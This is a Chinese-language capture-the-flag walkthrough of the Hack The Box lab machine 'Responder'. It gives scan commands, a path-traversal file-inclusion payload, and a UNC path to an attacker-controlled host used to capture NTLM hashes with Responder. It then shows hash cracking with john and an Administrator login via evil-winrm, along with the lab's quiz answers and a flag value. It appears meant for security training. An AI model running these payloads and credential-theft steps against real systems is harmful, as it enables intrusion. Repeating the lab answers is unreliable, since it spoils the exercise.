靶机地址: 10.129.125.204
端口扫描
输入: Nmap -v -A -p- 10.129.125.204
-v : 增加输出的详细程度
-A: 一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描
-p-: 扫描所有65535端口
除此之外,可以使用man nmap查看nmap手册,里面有参数的详细解释
也可以使用tldr nmap获取一些命令的使用例子
扫描结果
访问目标
在fox浏览器中访问10.129.125.204
网页跳转到了unika.htb,我们可以尝试修改hosts文件, 将靶机地址指向该域名
输入: Vim /etc/host
改完后:wq进行保存
再次访问靶机地址,成功打开
目录扫描
输入: dirsearch -u 10.129.125.204
得到一些文件信息
查看一下hack the box中的问题
答案: unika.htb
答案: php
通过插件wappalyzer可以得到网页的信息
也可以通过nikto -host 10.129.125.204,获得网站信息
答案:page
点击FR切换语言
答案: ../../../../../../../../windows/system32/drivers/etc/hosts
答案: //10.10.14.6/somefile
文件包含是指程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。
本地文件包含: 被包含的文件在服务器本地
远程文件包含: 被包含的文件在第三方服务器
文件包含漏洞: 通过函数包含文件时,由于没有对包含的文件名进行有效的过滤处理,被攻击者利用从而导致了包含了Web根目录以外的文件进来,导致文件信息的泄露甚至注入了恶意代码
所以该靶机存在文件包含漏洞
漏洞利用
查看本机ip信息
输入: ifconfig
我们可以使用responder -I tun0,监听tun0网卡, 为获得登录信息
根据题目给出的远程文件//10.10.14.6/somefile,把地址改为自己机器的地址,进行访问
得到一串hash值
将这串内容复制,保存到一个新文件中
使用john对其进行破解
john --wordlist=/usr/share/wordlists/rockyou.txt responder
--wordlist 用来指定字典
得到密码:badminton
答案: New Technology Lan Manager
NTLM(New Technology Lan Manager),是指telnet 的一种验证身份方式,即问询/应答身份验证协议,是Windows NT 早期版本的标准安全协议
答案: -I
responder -h 查看responder用法
答案: John The Ripper
答案: badminton
答案: 5985
WinRM(Windows Remote Management)windows远程管理,这个是基于powershell的功能
检测 WinRM 是否可用的最简单方法是查看端口是否打开, 如果这两个端口有一个打开:
5985/tcp (HTTP)
5986/tcp (HTTPS)
说明WinRM已配置,可以尝试进入远程会话
答案: ea81b7afddd03efaa0945333ed147fac
使用evil-winrm对目标进行连接
输入: evil-winrm -i 10.129.125.204 -u Administrator -p badminton
连接成功
使用dir可以查看当前目录下存在哪些文件
使用cd .. 返回上一级目录
最后C:\Users\mike\Desktop目录下在找到flag.txt